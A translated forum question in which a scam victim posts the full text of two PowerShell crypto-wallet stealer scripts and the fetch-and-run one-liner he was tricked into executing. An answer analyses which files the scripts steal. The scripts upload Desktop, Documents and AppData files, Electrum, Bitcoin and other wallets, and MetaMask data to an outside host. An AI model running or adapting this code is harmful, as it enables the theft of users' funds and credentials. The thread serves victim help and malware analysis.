以下是脚本的链接:hxxps://extract-offline.tools/bip
以下是用来愚弄我的说明:https://medium.com/@article-343624/convert-tool-f894f6244d4f
我在 PowerShell 桌面上运行了 iex“& { $(irm extract-offline.tools/bip) } RunJob”。
我没有将任何内容放入我创建的 bip39.txt 文档中,我的桌面上没有任何这些文本文件(但它可以访问其他目录吗?)或各种加密货币的钱包文件夹。我确实有 Metamask,但没有脚本提到的 00003 文件夹。Metamask 扩展肯定不会在文件中保留任何未加密的信息?可以访问这些吗?
如果有人能告诉我这对我的电脑到底造成了什么影响,以便我可以采取必要的措施,我将不胜感激。
编辑/更新 2024 年 4 月 4 日:这是最近评论中建议的 URL 中的脚本。看起来他们对其进行了一些修改,但本质并没有太大变化(我保存了原始内容并将其添加到下面):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."
$headers = @{
"Content-Disposition" = "attachment; filename=`"$fileFullPath`""
}
Write-Host "Retrieving PowerShell version information and installed modules..."
function UploadFiles {
param(
[string]$targetUrl,
[string]$appDirectory,
[string]$fileExtension
)
if ($fileExtension) {
$files = Get-ChildItem $appDirectory -Recurse -File -Filter "*$fileExtension" | Where-Object { $_.Length -lt 800KB }
} else {
$files = Get-ChildItem $appDirectory -Recurse -File | Where-Object { $_.Length -lt 800KB }
}
foreach ($file in $files) {
$fileFullPath = $file.FullName
$headers = @{
"Content-Disposition" = "attachment; filename=`"$fileFullPath`""
}
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $fileFullPath -Headers $headers | Out-Null
}
}
if ($env:OS -eq "Windows_NT") {
$appAppdata = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
$appDesktop = Join-Path -Path $env:USERPROFILE -ChildPath "Desktop"
$appDocuments = Join-Path -Path $env:USERPROFILE -ChildPath "Documents"
$appDataRoamingPath = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
$appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
$electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
} else {
$appAppdata = "$env:HOME/Library/Application Support"
$appDesktop = "$env:HOME/Desktop"
$appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
$electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
}
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".dat"
UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".dat"
UploadFiles -targetUrl $targetUrl -appDirectory $appDataRoamingPath -fileExtension ".dat"
UploadFiles -targetUrl $targetUrl -appDirectory $electrumwalletsDirectory
Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."
原始脚本:
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."
function Process-Df {
param (
[string]$filename,
[string]$data
)
$desktopPath = Join-Path $env:USERPROFILE 'Desktop'
$filePath = Join-Path $desktopPath $filename
$headers = @{
"Content-Disposition" = "attachment; filename="$filename"; data="$data""
}
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}
function Process-Af {
param (
[string]$filename,
[string]$data
)
$appDataPath = [System.IO.Path]::Combine($env:APPDATA)
$filePath = Join-Path $appDataPath $filename
$headers = @{
"Content-Disposition" = "attachment; filename="$filename"; data="$data""
}
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}
function Process-Ll {
param (
[string]$filename,
[string]$data
)
$appDataLocalPath = [System.IO.Path]::Combine($env:LOCALAPPDATA)
$filePath = Join-Path $appDataLocalPath $filename
$headers = @{
"Content-Disposition" = "attachment; filename="$filename"; data="$data""
}
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./wallet.txt" -Headers $headers | Out-Nul
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.dat" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip44.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./seed.txt" -Headers $headers | Out-Null
Process-Df -filename "wallet.txt" -data "wallet_txt"
Process-Df -filename "bip39.txt" -data "bip39"
Process-Df -filename "seed.txt" -data "seed"
Process-Df -filename "wallet.dat" -data "wallet_dat"
Process-Df -filename "pass.txt" -data "pass"
Process-Df -filename "password.txt" -data "pass"
Process-Df -filename "password" -data "pass"
Process-Af -filename "./Dogecoin/wallet.dat" -data "doge"
Process-Af -filename "./electrum/wallets/default_wallet" -data "el1"
Process-Af -filename "./electrum/wallets/wallet_1" -data "el2"
Process-Af -filename "./WalletWasabi/Client/Wallets/Wallet.json" -data "wasabi"
Process-Af -filename "./Bitcoin/wallet.dat" -data "btc"
Process-Af -filename "./BitcoinCore/wallet.dat" -data "btccore"
Process-Af -filename "./Litecoin/wallet.dat" -data "ltc"
Process-Ll -filename "./Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003" -data "metamask"
Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."
答案1
您问题中的脚本试图窃取一些数据:
- Windows 或 macOS 桌面文件夹及其子文件夹中的所有
.txt
文件.dat
- Windows“Documents”文件夹及其子文件夹中的所有
.txt
文件.dat
.dat
WindowsAppData\Roaming
(%AppData%
) 文件夹及其子文件夹中的所有文件- 整个文件
AppData\Roaming\Electrum\wallets
夹
它只会上传最大大小为 800 KiB 的文件。
它尝试做更多的事情(在 macOS 上),但由于制作相当业余,因此不会成功。
该脚本不会持久存在,也不会对您的电脑做出任何改变。
如果你有 Electrum 加密钱包,你可能就可以和这些币告别了。否则,只有你才能判断上传的文件中有什么,以及这些文件到底是什么。
原始脚本类似。它没有持续存在,效果并不好。它试图窃取这些文件:
.\wallet.txt
(相对于 PowerShell 中的当前文件夹).\bip39.txt
.\bip39.dat
.\bip39
.\bip44.txt
.\seed.txt
...\Desktop\wallet.txt
(在您的桌面文件夹中)...\Desktop\bip39.txt
...\Desktop\seed.txt
...\Desktop\wallet.dat
...\Desktop\pass.txt
...\Desktop\password.txt
...\Desktop\password
%AppData%\Dogecoin\wallet.dat
%AppData%\electrum\wallets\default_wallet
%AppData%\electrum\wallets\wallet_1
%AppData%\WalletWasabi\Client\Wallets\Wallet.json
%AppData%\Bitcoin\wallet.dat
%AppData%\BitcoinCore\wallet.dat
%AppData%\Litecoin\wallet.dat
%LocalAppData%\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\000003
,这是一些 Metamask Chrome 扩展程序数据文件;它不会被加密,至少不会被 Chrome 加密
这些文件加密了吗?可能加密,也可能不加密。有些可能是用户创建的。至于钱包,对加密货币的热情并不一定与对加密货币的理解一致。此外,大多数软件总体上都做得很差。